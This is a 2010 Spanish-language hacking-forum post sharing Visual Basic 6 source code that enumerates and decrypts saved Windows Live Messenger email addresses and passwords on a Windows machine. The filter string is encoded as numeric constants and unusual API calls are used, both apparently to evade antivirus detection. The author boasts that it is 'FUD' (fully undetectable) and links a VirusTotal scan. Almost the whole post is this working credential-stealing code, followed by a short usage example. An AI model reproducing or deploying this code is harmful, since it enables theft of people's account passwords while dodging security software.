elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [SRC][VB6] Windows Live Messenger - Recupera contraseña {FUUUUD!!!}
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [SRC][VB6] Windows Live Messenger - Recupera contraseña {FUUUUD!!!}  (Leído 3,504 veces)
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
[SRC][VB6] Windows Live Messenger - Recupera contraseña {FUUUUD!!!}
« en: 11 Julio 2010, 21:47 pm »

Código
  1. Option Explicit
  2.  
  3. 'KERNEL32
  4. Private Declare Function GetProcessHeap Lib "KERNEL32" () As Long
  5. 'ADVAPI32
  6. Private Declare Function CredEnumerateW Lib "ADVAPI32" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long
  7. 'CRYPT32
  8. Private Declare Function CryptUnprotectData Lib "CRYPT32" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As Long) As Long
  9. 'NTDLL
  10. Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal ProcessHandle As Long, ByVal BaseAddress As Long, ByVal pBuffer As Long, ByVal NumberOfBytesToWrite As Long, ByRef NumberOfBytesWritten As Long) As Long
  11. Private Declare Function RtlFreeHeap Lib "NTDLL" (ByVal HeapHandle As Long, ByVal Flags As Long, ByVal MemoryPointer As Long) As Long
  12.  
  13. Private Type DATA_BLOB
  14.    cbData                  As Long
  15.    pbData                  As Long
  16. End Type
  17.  
  18. Public Type ACCOUNT_INFO
  19.    sMail                   As String
  20.    sPassword               As String
  21. End Type
  22.  
  23. Public Function sMSN() As ACCOUNT_INFO()
  24.    Dim tTMP()      As ACCOUNT_INFO
  25.    Dim i           As Long
  26.    Dim x           As Long
  27.    Dim lCount      As Long
  28.    Dim lCred       As Long
  29.    Dim lPtr        As Long
  30.    Dim lUser       As Long
  31.    Dim tBlobIn     As DATA_BLOB
  32.    Dim bvGUID(4)   As Currency
  33.  
  34.    bvGUID(0) = 2814797012434.9527@
  35.    bvGUID(1) = 2139259215904.7791@
  36.    bvGUID(2) = 1632598244864.8297@
  37.    bvGUID(3) = 2842944080556.8622@
  38.    bvGUID(4) = 275.2573@
  39.    'bvGUID = "WindowsLive:name=*"
  40.  
  41.    Call CredEnumerateW(VarPtr(bvGUID(0)), 0, lCount, lCred)
  42.  
  43.    For i = 0 To lCount - 1
  44.        Call NtWriteVirtualMemory(-1, ByVal VarPtr(lPtr), ByVal lCred + (i * &H4), &H4, 0)
  45.        Call NtWriteVirtualMemory(-1, ByVal VarPtr(lUser), ByVal (lPtr + &H30), &H4, 0)
  46.        Call NtWriteVirtualMemory(-1, ByVal VarPtr(tBlobIn.cbData), ByVal (lPtr + &H18), &H8, 0)
  47.  
  48.        Call CryptUnprotectData(tBlobIn, 0&, 0&, 0&, 0&, 1&, 0&)
  49.  
  50.        If tBlobIn.cbData Then
  51.            ReDim Preserve tTMP(x)
  52.            With tTMP(x)
  53.                .sPassword = Space$(tBlobIn.cbData \ 2)
  54.                Call NtWriteVirtualMemory(-1, ByVal StrPtr(.sPassword), ByVal tBlobIn.pbData, tBlobIn.cbData, 0)
  55.                If Len(.sPassword) > 0 Then
  56.                    .sMail = uReadStr(lUser)
  57.                End If
  58.            End With
  59.            x = x + 1
  60.        End If
  61.    Next i
  62.  
  63.    Call RtlFreeHeap(GetProcessHeap(), 0, lCred)
  64.  
  65.    sMSN = tTMP
  66. End Function
  67.  
  68. Private Function uReadStr(ByVal lPtr As Long) As String
  69.    Dim iChar       As Integer
  70.    Dim i           As Long
  71.  
  72.    Do
  73.        Call NtWriteVirtualMemory(-1, ByVal VarPtr(iChar), ByVal (lPtr + i * 2), 2, ByVal 0&)
  74.        i = i + 1
  75.        If iChar = 0 Then Exit Do
  76.        uReadStr = uReadStr & ChrW$(iChar)
  77.    Loop
  78. End Function
Código:
http://www.virustotal.com/es/analisis/2d7deb3a66001d026c2267bec22393727c97ee4ac70bb3995b10622518391189-1278876972
Ale, a ver cuanto dura FUD :D

Ejemplo de uso:
Código
  1.    Dim i   As Long
  2.    Dim x() As ACCOUNT_INFO
  3.  
  4.    x = sMSN
  5.  
  6.    For i = LBound(x) To UBound(x)
  7.        Debug.Print x(i).sMail, x(i).sPassword
  8.    Next i

A disfrutar!!! >:D >:D :xD


« Última modificación: 11 Julio 2010, 21:49 pm por Karcrack » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines